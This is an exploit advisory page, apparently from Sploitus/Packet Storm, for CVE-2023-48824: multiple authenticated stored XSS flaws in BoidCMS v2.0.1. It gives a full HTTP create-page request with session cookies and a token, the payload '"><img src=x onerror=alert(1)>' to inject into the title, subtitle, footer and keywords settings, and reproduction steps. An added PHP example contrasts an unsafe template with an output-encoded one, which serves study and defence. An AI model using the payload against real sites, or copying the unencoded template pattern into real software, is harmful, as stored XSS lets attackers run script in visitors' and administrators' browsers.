## https://sploitus.com/exploit?id=PACKETSTORM:176031
# Exploit Title: BoidCMS v2.0.1 - Multiple Stored XSS  
# Date: 13/11/2023  
# Exploit Author: BugsBD Limited  
# Discovered by: Rahad Chowdhury  
# Vendor Homepage: https://boidcms.github.io/#/  
# Software Link: https://github.com/BoidCMS/BoidCMS/archive/refs/tags/v2.0.1.zip  
# Version: v2.0.1  
# Tested on: Windows 10, PHP 8.2.4, Apache 2.4.56  
# CVE: CVE-2023-48824  
  
Description:  
BoidCMS v2.0.1 is vulnerable to multiple authenticated stored Cross-Site  
Scripting (XSS) vulnerabilities in the "title, subtitle, footer,  
keywords" parameters of the settings and create page.  
  
  
Steps to Reproduce:  
  
1. Request:  
  
POST /BoidCMS/admin?page=create HTTP/1.1  
Host: 192.168.1.74  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate, br  
Content-Type: multipart/form-data; boundary=---------------------------9882691211259772119227456445  
Content-Length: 1492  
Origin: http://192.168.1.74  
Connection: close  
Referer: http://192.168.1.74/BoidCMS/admin?page=create  
Cookie: PHPSESSID=51i07vv0i4bqf0s9sl14tshq20; KOD_SESSION_SSO=8lu85nmqbd7o912f2lldm1g08k; KOD_SESSION_ID_53f4f=p7am25v0dladkuqetsqer4mdhc  
Upgrade-Insecure-Requests: 1  
  
-----------------------------9882691211259772119227456445  
Content-Disposition: form-data; name="type"  
  
post  
-----------------------------9882691211259772119227456445  
Content-Disposition: form-data; name="title"  
  
test  
-----------------------------9882691211259772119227456445  
Content-Disposition: form-data; name="descr"  
  
test  
-----------------------------9882691211259772119227456445  
Content-Disposition: form-data; name="keywords"  
  
test  
-----------------------------9882691211259772119227456445  
Content-Disposition: form-data; name="content"  
  
test  
-----------------------------9882691211259772119227456445  
Content-Disposition: form-data; name="permalink"  
  
  
-----------------------------9882691211259772119227456445  
Content-Disposition: form-data; name="tpl"  
  
theme.php  
-----------------------------9882691211259772119227456445  
Content-Disposition: form-data; name="thumb"  
  
  
-----------------------------9882691211259772119227456445  
Content-Disposition: form-data; name="date"  
  
2023-12-02T19:41  
-----------------------------9882691211259772119227456445  
Content-Disposition: form-data; name="pub"  
  
true  
-----------------------------9882691211259772119227456445  
Content-Disposition: form-data; name="token"  
  
83f330c1fea7a77a033324b848b5cd623d17d5cf25de1975ff2cce32badbe9cd  
-----------------------------9882691211259772119227456445  
Content-Disposition: form-data; name="create"  
  
Create  
-----------------------------9882691211259772119227456445--  
  
  
2. Now use the XSS payload "><img src=x onerror=alert(1)> in the "title,  
subtitle, footer, keywords" parameters.  
3. Save and check the home page.  
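
Why the leading `">` in the payload matters, and what output encoding does to it, shown as an added example that is not BoidCMS code or part of the original advisory. The `$site` array, the function names and the `<meta>` template are assumptions made for illustration; the sample values are constructed.

```php
<?php
declare(strict_types=1);
// Added example: hypothetical template code, not taken from BoidCMS.

// Constructed sample of stored settings; 'keywords' holds the payload from step 2.
$site = [
    'title'    => 'My Blog',
    'subtitle' => 'Notes & drafts',
    'footer'   => '(c) 2023',
    'keywords' => '"><img src=x onerror=alert(1)>',
];

// Encode a stored value for HTML text and quoted-attribute contexts.
function esc(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Vulnerable pattern: stored values are concatenated into markup as-is.
function render_head_unsafe(array $site): string
{
    return '<title>' . $site['title'] . '</title>' . "\n"
         . '<meta name="keywords" content="' . $site['keywords'] . '">';
}

// Hardened pattern: every stored field is encoded at output time.
function render_head_safe(array $site): string
{
    return '<title>' . esc($site['title']) . '</title>' . "\n"
         . '<meta name="keywords" content="' . esc($site['keywords']) . '">';
}

// Audit helper: names of stored fields that contain markup-significant characters.
function suspicious_fields(array $site): array
{
    return array_keys(array_filter(
        $site,
        static fn (string $v): bool => preg_match('/[<>"\']/', $v) === 1
    ));
}

// Unsafe output: the quote closes content="..." early and the <img> tag becomes live markup.
echo render_head_unsafe($site), "\n\n";
// Safe output: the same bytes stay inside the attribute value as inert text.
echo render_head_safe($site), "\n\n";
// Fields worth reviewing in already-stored data.
echo implode(', ', suspicious_fields($site)), "\n";
```

Encoding at render time also neutralises values that were stored before a fix was deployed, which input filtering alone would not.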
  
  
  
## Reproduce:  
[https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48824](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48824)